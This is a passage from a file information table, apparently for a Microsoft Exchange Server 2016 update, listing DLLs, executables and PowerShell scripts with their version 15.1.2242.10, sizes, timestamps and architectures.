27-Apr-21| 12:50| x64 \nExeventperfplugin.dll| 15.1.2242.10| 25,464| 27-Apr-21| 12:50| x64 \nExmime.dll| 15.1.2242.10| 364,920| 27-Apr-21| 12:50| x64 \nExportedgeconfig.ps1| Not applicable| 27,387| 27-Apr-21| 12:50| Not applicable \nExport_mailpublicfoldersformigration.ps1| Not applicable| 18,554| 27-Apr-21| 12:50| Not applicable \nExport_modernpublicfolderstatistics.ps1| Not applicable| 28,850| 27-Apr-21| 12:50| Not applicable \nExport_outlookclassification.ps1| Not applicable| 14,410| 27-Apr-21| 12:50| Not applicable \nExport_publicfolderstatistics.ps1| Not applicable| 23,117| 27-Apr-21| 12:50| Not applicable \nExport_retentiontags.ps1| Not applicable| 17,040| 27-Apr-21| 12:50| Not applicable \nExppw.dll| 15.1.2242.10| 83,320| 27-Apr-21| 12:48| x64 \nExprfdll.dll| 15.1.2242.10| 26,504| 27-Apr-21| 12:50| x64 \nExrpc32.dll| 15.1.2242.10| 1,922,936| 27-Apr-21| 12:49| x64 \nExrw.dll| 15.1.2242.10| 28,048| 27-Apr-21| 12:49| x64 \nExsetdata.dll| 15.1.2242.10| 2,779,016| 27-Apr-21| 12:50| x64 \nExsetup.exe| 15.1.2242.10| 35,192| 27-Apr-21| 12:50| x86 \nExsetupui.exe| 15.1.2242.10| 193,400| 27-Apr-21| 12:50| x86 \nExtrace.dll| 15.1.2242.10| 245,112| 27-Apr-21| 12:48| x64 \nExt_microsoft.exchange.data.transport.dll| 15.1.2242.10| 601,488| 27-Apr-21| 12:48| x86 \nExwatson.dll| 15.1.2242.10| 44,944| 27-Apr-21| 12:48| x64 \nFastioext.dll| 15.1.2242.10| 60,280| 27-Apr-21| 12:50| x64 \nFil06f84122c94c91a0458cad45c22cce20| Not applicable| 784,715| 27-Apr-21| 12:48| Not applicable \nFil143a7a5d4894478a85eefc89a6539fc8| Not applicable| 1,909,229| 27-Apr-21| 12:49| Not applicable \nFil19f527f284a0bb584915f9994f4885c3| Not applicable| 648,761| 27-Apr-21| 12:49| Not applicable \nFil1a9540363a531e7fb18ffe600cffc3ce| Not applicable| 358,406| 27-Apr-21| 12:50| Not applicable \nFil220d95210c8697448312eee6628c815c| Not applicable| 303,658| 27-Apr-21| 12:50| Not applicable \nFil2cf5a31e239a45fabea48687373b547c| Not applicable| 652,727| 27-Apr-21| 12:49| Not applicable \nFil397f0b1f1d7bd44d6e57e496decea2ec| Not applicable| 784,712| 27-Apr-21| 12:49| Not applicable \nFil3ab126057b34eee68c4fd4b127ff7aee| Not applicable| 784,688| 27-Apr-21| 12:48| Not applicable \nFil41bb2e5743e3bde4ecb1e07a76c5a7a8| Not applicable| 149,154| 27-Apr-21| 12:49| Not applicable \nFil51669bfbda26e56e3a43791df94c1e9c| Not applicable| 9,346| 27-Apr-21| 12:49| Not applicable \nFil558cb84302edfc96e553bcfce2b85286| Not applicable| 85,260| 27-Apr-21| 12:48| Not applicable \nFil55ce217251b77b97a46e914579fc4c64| Not applicable| 648,755| 27-Apr-21| 12:49| Not applicable \nFil5a9e78a51a18d05bc36b5e8b822d43a8| Not applicable| 1,597,359| 27-Apr-21| 12:48| Not applicable \nFil5c7d10e5f1f9ada1e877c9aa087182a9| Not applicable| 1,597,359| 27-Apr-21| 12:48| Not applicable \nFil6569a92c80a1e14949e4282ae2cc699c| Not applicable| 1,597,359| 27-Apr-21| 12:48| Not applicable \nFil6a01daba551306a1e55f0bf6894f4d9f| Not applicable| 648,731| 27-Apr-21| 12:48| Not applicable \nFil8863143ea7cd93a5f197c9fff13686bf| Not applicable| 648,761| 27-Apr-21| 12:49| Not applicable \nFil8a8c76f225c7205db1000e8864c10038| Not applicable| 1,597,359| 27-Apr-21| 12:48| Not applicable \nFil8cd999415d36ba78a3ac16a080c47458| Not applicable| 784,718| 27-Apr-21| 12:49| Not applicable \nFil97913e630ff02079ce9889505a517ec0| Not applicable| 1,597,359| 27-Apr-21| 12:48| Not applicable \nFilaa49badb2892075a28d58d06560f8da2| Not applicable| 785,742| 27-Apr-21| 12:49| Not applicable \nFilae28aeed23ccb4b9b80accc2d43175b5| Not applicable| 648,758| 27-Apr-21| 12:49| Not applicable \nFilb17f496f9d880a684b5c13f6b02d7203| Not applicable| 784,718| 27-Apr-21| 12:49| Not applicable \nFilb94ca32f2654692263a5be009c0fe4ca| Not applicable| 2,564,949| 27-Apr-21| 12:49| Not applicable \nFilbabdc4808eba0c4f18103f12ae955e5c| Not applicable| #########| 27-Apr-21| 12:49| Not applicable \nFilc92cf2bf29bed21bd5555163330a3d07| Not applicable| 652,745| 27-Apr-21| 12:49| Not applicable \nFilcc478d2a8346db20c4e2dc36f3400628| Not applicable| 784,718| 27-Apr-21| 12:49| Not applicable \nFild26cd6b13cfe2ec2a16703819da6d043| Not applicable| 1,597,359| 27-Apr-21| 12:48| Not applicable \nFilf2719f9dc8f7b74df78ad558ad3ee8a6| Not applicable| 785,724| 27-Apr-21| 12:49| Not applicable \nFilfa5378dc76359a55ef20cc34f8a23fee| Not applicable| 1,427,187| 27-Apr-21| 12:49| Not applicable \nFilteringconfigurationcommands.ps1| Not applicable| 18,227| 27-Apr-21| 12:50| Not applicable \nFilteringpowershell.dll| 15.1.2242.10| 223,120| 27-Apr-21| 12:49| x86 \nFilteringpowershell.format.ps1xml| Not applicable| 29,691| 27-Apr-21| 12:49| Not applicable \nFiltermodule.dll| 15.1.2242.10| 180,088| 27-Apr-21| 12:49| x64 \nFipexeuperfctrresource.dll| 15.1.2242.10| 15,248| 27-Apr-21| 12:49| x64 \nFipexeventsresource.dll| 15.1.2242.10| 44,920| 27-Apr-21| 12:50| x64 \nFipexperfctrresource.dll| 15.1.2242.10| 32,656| 27-Apr-21| 12:50| x64 \nFirewallres.dll| 15.1.2242.10| 72,584| 27-Apr-21| 12:50| x64 \nFms.exe| 15.1.2242.10| 1,350,024| 27-Apr-21| 12:49| x64 \nForefrontactivedirectoryconnector.exe| 15.1.2242.10| 110,992| 27-Apr-21| 12:50| x64 \nFpsdiag.exe| 15.1.2242.10| 18,832| 27-Apr-21| 12:50| x86 \nFsccachedfilemanagedlocal.dll| 15.1.2242.10| 822,160| 27-Apr-21| 12:49| x64 \nFscconfigsupport.dll| 15.1.2242.10| 56,720| 27-Apr-21| 12:49| x86 \nFscconfigurationserver.exe| 15.1.2242.10| 430,992| 27-Apr-21| 12:49| x64 \nFscconfigurationserverinterfaces.dll| 15.1.2242.10| 15,736| 27-Apr-21| 12:49| x86 \nFsccrypto.dll| 15.1.2242.10| 208,760| 27-Apr-21| 12:49| x64 \nFscipcinterfaceslocal.dll| 15.1.2242.10| 28,560| 27-Apr-21| 12:49| x86 \nFscipclocal.dll| 15.1.2242.10| 38,280| 27-Apr-21| 12:49| x86 \nFscsqmuploader.exe| 15.1.2242.10| 453,496| 27-Apr-21| 12:50| x64 \nGetucpool.ps1| Not applicable| 19,771| 27-Apr-21| 12:50| Not applicable \nGetvalidengines.ps1| Not applicable| 13,270| 27-Apr-21| 12:50| Not applicable \nGet_antispamfilteringreport.ps1| Not applicable| 15,789| 27-Apr-21| 12:50| Not applicable \nGet_antispamsclhistogram.ps1| Not applicable| 14,635| 27-Apr-21| 12:50| Not applicable \nGet_antispamtopblockedsenderdomains.ps1| Not applicable| 15,707| 27-Apr-21| 12:50| Not applicable \nGet_antispamtopblockedsenderips.ps1| Not applicable| 14,755| 27-Apr-21| 12:50| Not applicable \nGet_antispamtopblockedsenders.ps1| Not applicable| 15,474| 27-Apr-21| 12:50| Not applicable \nGet_antispamtoprblproviders.ps1| Not applicable| 14,685| 27-Apr-21| 12:50| Not applicable \nGet_antispamtoprecipients.ps1| Not applicable| 14,790| 27-Apr-21| 12:49| Not applicable \nGet_dleligibilitylist.ps1| Not applicable| 42,328| 27-Apr-21| 12:50| Not applicable \nGet_exchangeetwtrace.ps1| Not applicable| 28,943| 27-Apr-21| 12:50| Not applicable \nGet_publicfoldermailboxsize.ps1| Not applicable| 15,018| 27-Apr-21| 12:50| Not applicable \nGet_storetrace.ps1| Not applicable| 50,607| 27-Apr-21| 12:50| Not applicable \nHuffman_xpress.dll| 15.1.2242.10| 32,656| 27-Apr-21| 12:50| x64 \nImportedgeconfig.ps1| Not applicable| 77,244| 27-Apr-21| 12:50| Not applicable \nImport_mailpublicfoldersformigration.ps1| Not applicable| 29,476| 27-Apr-21| 12:50| Not applicable \nImport_retentiontags.ps1| Not applicable| 28,814| 27-Apr-21| 12:50| Not applicable \nInproxy.dll| 15.1.2242.10| 85,904| 27-Apr-21| 12:48| x64 \nInstallwindowscomponent.ps1| Not applicable| 34,535| 27-Apr-21| 12:50| Not applicable \nInstall_antispamagents.ps1| Not applicable| 17,905| 27-Apr-21| 12:50| Not applicable \nInstall_odatavirtualdirectory.ps1| Not applicable| 17,979| 27-Apr-21| 12:50| Not applicable \nInterop.activeds.dll.4b7767dc_2e20_4d95_861a_4629cbc0cabc| 15.1.2242.10| 107,384| 27-Apr-21| 12:49| Not applicable \nInterop.adsiis.dll.4b7767dc_2e20_4d95_861a_4629cbc0cabc| 15.1.2242.10| 20,368| 27-Apr-21| 12:50| Not applicable \nInterop.certenroll.dll| 15.1.2242.10| 142,728| 27-Apr-21| 12:49| x86 \nInterop.licenseinfointerface.dll| 15.1.2242.10| 14,200| 27-Apr-21| 12:49| x86 \nInterop.netfw.dll| 15.1.2242.10| 34,184| 27-Apr-21| 12:48| x86 \nInterop.plalibrary.dll| 15.1.2242.10| 72,584| 27-Apr-21| 12:48| x86 \nInterop.stdole2.dll.4b7767dc_2e20_4d95_861a_4629cbc0cabc| 15.1.2242.10| 27,008| 27-Apr-21| 12:50| Not applicable \nInterop.taskscheduler.dll| 15.1.2242.10| 46,480| 27-Apr-21| 12:48| x86 \nInterop.wuapilib.dll| 15.1.2242.10| 60,816| 27-Apr-21| 12:50| x86 \nInterop.xenroll.dll| 15.1.2242.10| 39,824| 27-Apr-21| 12:49| x86 \nKerbauth.dll| 15.1.2242.10| 62,864| 27-Apr-21| 12:50| x64 \nLicenseinfointerface.dll| 15.1.2242.10| 643,448| 27-Apr-21| 12:49| x64 \nLpversioning.xml| Not applicable| 20,422| 27-Apr-21| 12:50| Not applicable \nMailboxdatabasereseedusingspares.ps1| Not applicable| 31,896| 27-Apr-21| 12:50| Not applicable \nManagedavailabilitycrimsonmsg.dll| 15.1.2242.10| 138,616| 27-Apr-21| 12:50| x64 \nManagedstorediagnosticfunctions.ps1| Not applicable| 125,873| 27-Apr-21| 12:50| Not applicable \nManagescheduledtask.ps1| Not applicable| 36,372| 27-Apr-21| 12:50| Not applicable \nMce.dll| 15.1.2242.10| 1,693,064| 27-Apr-21| 12:48| x64 \nMeasure_storeusagestatistics.ps1| Not applicable| 29,483| 27-Apr-21| 12:50| Not applicable \nMerge_publicfoldermailbox.ps1| Not applicable| 22,619| 27-Apr-21| 12:50| Not applicable \nMicrosoft.database.isam.dll| 15.1.2242.10| 127,352| 27-Apr-21| 12:50| x86 \nMicrosoft.dkm.proxy.dll| 15.1.2242.10| 25,992| 27-Apr-21| 12:49| x86 \nMicrosoft.exchange.activemonitoring.activemonitoringvariantconfig.dll| 15.1.2242.10| 68,472| 27-Apr-21| 12:49| x86 \nMicrosoft.exchange.activemonitoring.eventlog.dll| 15.1.2242.10| 17,784| 27-Apr-21| 12:50| x64 \nMicrosoft.exchange.addressbook.service.dll| 15.1.2242.10| 232,840| 27-Apr-21| 12:49| x86 \nMicrosoft.exchange.addressbook.service.eventlog.dll| 15.1.2242.10| 15,760| 27-Apr-21| 12:50| x64 \nMicrosoft.exchange.airsync.airsyncmsg.dll| 15.1.2242.10| 43,400| 27-Apr-21| 12:50| x64 \nMicrosoft.exchange.airsync.comon.dll| 15.1.2242.10| 1,775,480| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.airsync.dll1| 15.1.2242.10| 505,736| 27-Apr-21| 12:49| Not applicable \nMicrosoft.exchange.airsynchandler.dll| 15.1.2242.10| 76,152| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.anchorservice.dll| 15.1.2242.10| 135,568| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.antispam.eventlog.dll| 15.1.2242.10| 23,440| 27-Apr-21| 12:50| x64 \nMicrosoft.exchange.antispamupdate.eventlog.dll| 15.1.2242.10| 15,736| 27-Apr-21| 12:50| x64 \nMicrosoft.exchange.antispamupdatesvc.exe| 15.1.2242.10| 27,000| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.approval.applications.dll| 15.1.2242.10| 53,640| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.assistants.dll| 15.1.2242.10| 924,048| 27-Apr-21| 12:49| x86 \nMicrosoft.exchange.assistants.eventlog.dll| 15.1.2242.10| 25,976| 27-Apr-21| 12:50| x64 \nMicrosoft.exchange.assistants.interfaces.dll| 15.1.2242.10| 42,376| 27-Apr-21| 12:49| x86 \nMicrosoft.exchange.audit.azureclient.dll| 15.1.2242.10| 15,224| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.auditlogsearch.eventlog.dll| 15.1.2242.10| 14,712| 27-Apr-21| 12:50| x64 \nMicrosoft.exchange.auditlogsearchservicelet.dll| 15.1.2242.10| 70,520| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.auditstoragemonitorservicelet.dll| 15.1.2242.10| 94,584| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.auditstoragemonitorservicelet.eventlog.dll| 15.1.2242.10| 13,192| 27-Apr-21| 12:50| x64 \nMicrosoft.exchange.authadmin.eventlog.dll| 15.1.2242.10| 15,736| 27-Apr-21| 12:50| x64 \nMicrosoft.exchange.authadminservicelet.dll| 15.1.2242.10| 36,728| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.authservicehostservicelet.dll| 15.1.2242.10| 15,744| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.autodiscover.configuration.dll| 15.1.2242.10| 79,752| 27-Apr-21| 12:49| x86 \nMicrosoft.exchange.autodiscover.dll| 15.1.2242.10| 396,152| 27-Apr-21| 12:48| x86 \nMicrosoft.exchange.autodiscover.eventlogs.dll| 15.1.2242.10| 21,368| 27-Apr-21| 12:50| x64 \nMicrosoft.exchange.autodiscoverv2.dll| 15.1.2242.10| 57,232| 27-Apr-21| 12:49| x86 \nMicrosoft.exchange.bandwidthmonitorservicelet.dll| 15.1.2242.10| 14,728| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.batchservice.dll| 15.1.2242.10| 35,720| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.cabutility.dll| 15.1.2242.10| 276,368| 27-Apr-21| 12:50| x64 \nMicrosoft.exchange.certificatedeployment.eventlog.dll| 15.1.2242.10| 16,272| 27-Apr-21| 12:50| x64 \nMicrosoft.exchange.certificatedeploymentservicelet.dll| 15.1.2242.10| 26,000| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.certificatenotification.eventlog.dll| 15.1.2242.10| 13,712| 27-Apr-21| 12:50| x64 \nMicrosoft.exchange.certificatenotificationservicelet.dll| 15.1.2242.10| 23,440| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.clients.common.dll| 15.1.2242.10| 377,208| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.clients.eventlogs.dll| 15.1.2242.10| 83,856| 27-Apr-21| 12:48| x64 \nMicrosoft.exchange.clients.owa.dll| 15.1.2242.10| 2,970,512| 27-Apr-21| 12:49| x86 \nMicrosoft.exchange.clients.owa2.server.dll| 15.1.2242.10| 5,028,744| 27-Apr-21| 12:49| x86 \nMicrosoft.exchange.clients.owa2.servervariantconfiguration.dll| 15.1.2242.10| 894,344| 27-Apr-21| 12:48| x86 \nMicrosoft.exchange.clients.security.dll| 15.1.2242.10| 413,584| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.clients.strings.dll| 15.1.2242.10| 924,560| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.cluster.bandwidthmonitor.dll| 15.1.2242.10| 31,632| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.cluster.common.dll| 15.1.2242.10| 52,088| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.cluster.common.extensions.dll| 15.1.2242.10| 21,880| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.cluster.diskmonitor.dll| 15.1.2242.10| 33,656| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.cluster.replay.dll| 15.1.2242.10| 3,478,392| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.cluster.replicaseeder.dll| 15.1.2242.10| 108,424| 27-Apr-21| 12:50| x64 \nMicrosoft.exchange.cluster.replicavsswriter.dll| 15.1.2242.10| 288,648| 27-Apr-21| 12:50| x64 \nMicrosoft.exchange.cluster.shared.dll| 15.1.2242.10| 621,960| 27-Apr-21| 12:49| x86 \nMicrosoft.exchange.common.agentconfig.transport.dll| 15.1.2242.10| 86,392| 27-Apr-21| 12:48| x86 \nMicrosoft.exchange.common.componentconfig.transport.dll| 15.1.2242.10| 1,827,704| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.common.directory.adagentservicevariantconfig.dll| 15.1.2242.10| 31,632| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.common.directory.directoryvariantconfig.dll| 15.1.2242.10| 466,320| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.common.directory.domtvariantconfig.dll| 15.1.2242.10| 25,992| 27-Apr-21| 12:48| x86 \nMicrosoft.exchange.common.directory.ismemberofresolverconfig.dll| 15.1.2242.10| 38,264| 27-Apr-21| 12:49| x86 \nMicrosoft.exchange.common.directory.tenantrelocationvariantconfig.dll| 15.1.2242.10| 102,776| 27-Apr-21| 12:48| x86 \nMicrosoft.exchange.common.directory.topologyservicevariantconfig.dll| 15.1.2242.10| 48,512| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.common.diskmanagement.dll| 15.1.2242.10| 67,464| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.common.dll| 15.1.2242.10| 172,944| 27-Apr-21| 12:48| x86 \nMicrosoft.exchange.common.encryption.variantconfig.dll| 15.1.2242.10| 113,544| 27-Apr-21| 12:48| x86 \nMicrosoft.exchange.common.il.dll| 15.1.2242.10| 13,704| 27-Apr-21| 12:48| x86 \nMicrosoft.exchange.common.inference.dll| 15.1.2242.10| 130,432| 27-Apr-21| 12:48| x86 \nMicrosoft.exchange.common.optics.dll| 15.1.2242.10| 63,880| 27-Apr-21| 12:49| x86 \nMicrosoft.exchange.common.processmanagermsg.dll| 15.1.2242.10| 19,832| 27-Apr-21| 12:50| x64 \nMicrosoft.exchange.common.protocols.popimap.dll| 15.1.2242.10| 15,240| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.common.search.dll| 15.1.2242.10| 107,912| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.common.search.eventlog.dll| 15.1.2242.10| 17,800| 27-Apr-21| 12:50| x64 \nMicrosoft.exchange.common.smtp.dll| 15.1.2242.10| 51,576| 27-Apr-21| 12:49| x86 \nMicrosoft.exchange.common.suiteservices.suiteservicesvariantconfig.dll| 15.1.2242.10| 36,744| 27-Apr-21| 12:48| x86 \nMicrosoft.exchange.common.transport.azure.dll| 15.1.2242.10| 27,536| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.common.transport.monitoringconfig.dll| 15.1.2242.10| 1,042,312| 27-Apr-21| 12:49| x86 \nMicrosoft.exchange.commonmsg.dll| 15.1.2242.10| 29,048| 27-Apr-21| 12:50| x64 \nMicrosoft.exchange.compliance.auditlogpumper.messages.dll| 15.1.2242.10| 13,192| 27-Apr-21| 12:50| x64 \nMicrosoft.exchange.compliance.auditservice.core.dll| 15.1.2242.10| 181,136| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.compliance.auditservice.messages.dll| 15.1.2242.10| 30,096| 27-Apr-21| 12:50| x64 \nMicrosoft.exchange.compliance.common.dll| 15.1.2242.10| 22,408| 27-Apr-21| 12:49| x86 \nMicrosoft.exchange.compliance.crimsonevents.dll| 15.1.2242.10| 85,896| 27-Apr-21| 12:49| x64 \nMicrosoft.exchange.compliance.dll| 15.1.2242.10| 41,344| 27-Apr-21| 12:48| x86 \nMicrosoft.exchange.compliance.recordreview.dll| 15.1.2242.10| 37,240| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.compliance.supervision.dll| 15.1.2242.10| 50,552| 27-Apr-21| 12:49| x86 \nMicrosoft.exchange.compliance.taskcreator.dll| 15.1.2242.10| 33,144| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.compliance.taskdistributioncommon.dll| 15.1.2242.10| 1,100,176| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.compliance.taskdistributionfabric.dll| 15.1.2242.10| 206,728| 27-Apr-21| 12:49| x86 \nMicrosoft.exchange.compliance.taskplugins.dll| 15.1.2242.10| 210,808| 27-Apr-21| 12:49| x86 \nMicrosoft.exchange.compression.dll| 15.1.2242.10| 17,288| 27-Apr-21| 12:49| x86 \nMicrosoft.exchange.configuration.certificateauth.dll| 15.1.2242.10| 37,752| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.configuration.certificateauth.eventlog.dll| 15.1.2242.10| 14,200| 27-Apr-21| 12:50| x64 \nMicrosoft.exchange.configuration.core.dll| 15.1.2242.10| 145,784| 27-Apr-21| 12:49| x86 \nMicrosoft.exchange.configuration.core.eventlog.dll| 15.1.2242.10| 14,224| 27-Apr-21| 12:50| x64 \nMicrosoft.exchange.configuration.delegatedauth.dll| 15.1.2242.10| 53,128| 27-Apr-21| 12:49| x86 \nMicrosoft.exchange.configuration.delegatedauth.eventlog.dll| 15.1.2242.10| 15,760| 27-Apr-21| 12:50| x64 \nMicrosoft.exchange.configuration.diagnosticsmodules.dll| 15.1.2242.10| 23,416| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.configuration.diagnosticsmodules.eventlog.dll| 15.1.2242.10| 13,200| 27-Apr-21| 12:50| x64 \nMicrosoft.exchange.configuration.failfast.dll| 15.1.2242.10| 54,648| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.configuration.failfast.eventlog.dll| 15.1.2242.10| 13,712| 27-Apr-21| 12:50| x64 \nMicrosoft.exchange.configuration.objectmodel.dll| 15.1.2242.10| 1,845,136| 27-Apr-21| 12:49| x86 \nMicrosoft.exchange.configuration.objectmodel.eventlog.dll| 15.1.2242.10| 30,096| 27-Apr-21| 12:50| x64 \nMicrosoft.exchange.configuration.redirectionmodule.dll| 15.1.2242.10| 68,472| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.configuration.redirectionmodule.eventlog.dll| 15.1.2242.10| 15,224| 27-Apr-21| 12:50| x64 \nMicrosoft.exchange.configuration.remotepowershellbackendcmdletproxymodule.dll| 15.1.2242.10| 21,384| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.configuration.remotepowershellbackendcmdletproxymodule.eventlog.dll| 15.1.2242.10| 13,176| 27-Apr-21| 12:50| x64 \nMicrosoft.exchange.connectiondatacollector.dll| 15.1.2242.10| 26,000| 27-Apr-21| 12:49| x86 \nMicrosoft.exchange.connections.common.dll| 15.1.2242.10| 169,864| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.connections.eas.dll| 15.1.2242.10| 330,104| 27-Apr-21| 12:49| x86 \nMicrosoft.exchange.connections.imap.dll| 15.1.2242.10| 173,960| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.connections.pop.dll| 15.1.2242.10| 71,032| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.contentfilter.wrapper.exe| 15.1.2242.10| 203,664| 27-Apr-21| 12:49| x64 \nMicrosoft.exchange.context.client.dll| 15.1.2242.10| 27,000| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.context.configuration.dll| 15.1.2242.10| 51,576| 27-Apr-21| 12:49| x86 \nMicrosoft.exchange.context.core.dll| 15.1.2242.10| 51,088| 27-Apr-21| 12:49| x86 \nMicrosoft.exchange.context.datamodel.dll| 15.1.2242.10| 46,992| 27-Apr-21| 12:49| x86 \nMicrosoft.exchange.core.strings.dll| 15.1.2242.10| 1,092,472| 27-Apr-21| 12:49| x86 \nMicrosoft.exchange.core.timezone.dll| 15.1.2242.10| 57,232| 27-Apr-21| 12:48| x86 \nMicrosoft.exchange.data.applicationlogic.deep.dll| 15.1.2242.10| 326,536| 27-Apr-21| 12:49| x86 \nMicrosoft.exchange.data.applicationlogic.dll| 15.1.2242.10| 3,356,552| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.data.applicationlogic.eventlog.dll| 15.1.2242.10| 35,704| 27-Apr-21| 12:50| x64 \nMicrosoft.exchange.data.applicationlogic.monitoring.ifx.dll| 15.1.2242.10| 17,808| 27-Apr-21| 12:49| x86 \nMicrosoft.exchange.data.connectors.dll| 15.1.2242.10| 165,248| 27-Apr-21| 12:48| x86 \nMicrosoft.exchange.data.consumermailboxprovisioning.dll| 15.1.2242.10| 619,400| 27-Apr-21| 12:48| x86 \nMicrosoft.exchange.data.directory.dll| 15.1.2242.10| 7,782,800| 27-Apr-21| 12:49| x86 \nMicrosoft.exchange.data.directory.eventlog.dll| 15.1.2242.10| 80,272| 27-Apr-21| 12:50| x64 \nMicrosoft.exchange.data.dll| 15.1.2242.10| 1,786,768| 27-Apr-21| 12:48| x86 \nMicrosoft.exchange.data.groupmailboxaccesslayer.dll| 15.1.2242.10| 1,626,512| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.data.ha.dll| 15.1.2242.10| 362,384| 27-Apr-21| 12:48| x86 \nMicrosoft.exchange.data.imageanalysis.dll| 15.1.2242.10| 105,848| 27-Apr-21| 12:49| x86 \nMicrosoft.exchange.data.mailboxfeatures.dll| 15.1.2242.10| 15,760| 27-Apr-21| 12:49| x86 \nMicrosoft.exchange.data.mailboxloadbalance.dll| 15.1.2242.10| 224,656| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.data.mapi.dll| 15.1.2242.10| 186,760| 27-Apr-21| 12:49| x86 \nMicrosoft.exchange.data.metering.contracts.dll| 15.1.2242.10| 39,816| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.data.metering.dll| 15.1.2242.10| 119,160| 27-Apr-21| 12:49| x86 \nMicrosoft.exchange.data.msosyncxsd.dll| 15.1.2242.10| 968,080| 27-Apr-21| 12:48| x86 \nMicrosoft.exchange.data.notification.dll| 15.1.2242.10| 141,200| 27-Apr-21| 12:49| x86 \nMicrosoft.exchange.data.personaldataplatform.dll| 15.1.2242.10| 769,400| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.data.providers.dll| 15.1.2242.10| 139,656| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.data.provisioning.dll| 15.1.2242.10| 56,712| 27-Apr-21| 12:49| x86 \nMicrosoft.exchange.data.rightsmanagement.dll| 15.1.2242.10| 453,008| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.data.scheduledtimers.dll| 15.1.2242.10| 32,648| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.data.storage.clientstrings.dll| 15.1.2242.10| 256,376| 27-Apr-21| 12:49| x86 \nMicrosoft.exchange.data.storage.dll| 15.1.2242.10| #########| 27-Apr-21| 12:48| x86 \nMicrosoft.exchange.data.storage.eventlog.dll| 15.1.2242.10| 37,752| 27-Apr-21| 12:50| x64 \nMicrosoft.exchange.data.storageconfigurationresources.dll| 15.1.2242.10| 655,736| 27-Apr-21| 12:48| x86 \nMicrosoft.exchange.data.storeobjects.dll| 15.1.2242.10| 174,480| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.data.throttlingservice.client.dll| 15.1.2242.10| 36,240| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.data.throttlingservice.client.eventlog.dll| 15.1.2242.10| 14,224| 27-Apr-21| 12:50| x64 \nMicrosoft.exchange.data.throttlingservice.eventlog.dll| 15.1.2242.10| 14,208| 27-Apr-21| 12:50| x64 \nMicrosoft.exchange.datacenter.management.activemonitoring.recoveryservice.eventlog.dll| 15.1.2242.10| 14,736| 27-Apr-21| 12:48| x64 \nMicrosoft.exchange.datacenterstrings.dll| 15.1.2242.10| 72,592| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.delivery.eventlog.dll| 15.1.2242.10| 13,176| 27-Apr-21| 12:50| x64 \nMicrosoft.exchange.diagnostics.certificatelogger.dll| 15.1.2242.10| 22,928| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.diagnostics.dll| 15.1.2242.10| 2,210,680| 27-Apr-21| 12:48| x86 \nMicrosoft.exchange.diagnostics.dll.deploy| 15.1.2242.10| 2,210,680| 27-Apr-21| 12:48| Not applicable \nMicrosoft.exchange.diagnostics.performancelogger.dll| 15.1.2242.10| 23,928| 27-Apr-21| 12:49| x86 \nMicrosoft.exchange.diagnostics.service.common.dll| 15.1.2242.10| 546,696| 27-Apr-21| 12:49| x86 \nMicrosoft.exchange.diagnostics.service.eventlog.dll| 15.1.2242.10| 215,440| 27-Apr-21| 12:50| x64 \nMicrosoft.exchange.diagnostics.service.exchangejobs.dll| 15.1.2242.10| 193,408| 27-Apr-21| 12:48| x86 \nMicrosoft.exchange.diagnostics.service.exe| 15.1.2242.10| 146,296| 27-Apr-21| 12:48| x86 \nMicrosoft.exchange.diagnostics.service.fuseboxperfcounters.dll| 15.1.2242.10| 27,536| 27-Apr-21| 12:48| x86 \nMicrosoft.exchange.diagnosticsaggregation.eventlog.dll| 15.1.2242.10| 13,688| 27-Apr-21| 12:50| x64 \nMicrosoft.exchange.diagnosticsaggregationservicelet.dll| 15.1.2242.10| 49,544| 27-Apr-21| 12:50| x86 \nMicrosoft.exchange.directory.topologyservice.eventlog.dll| 15.1.2242.10| 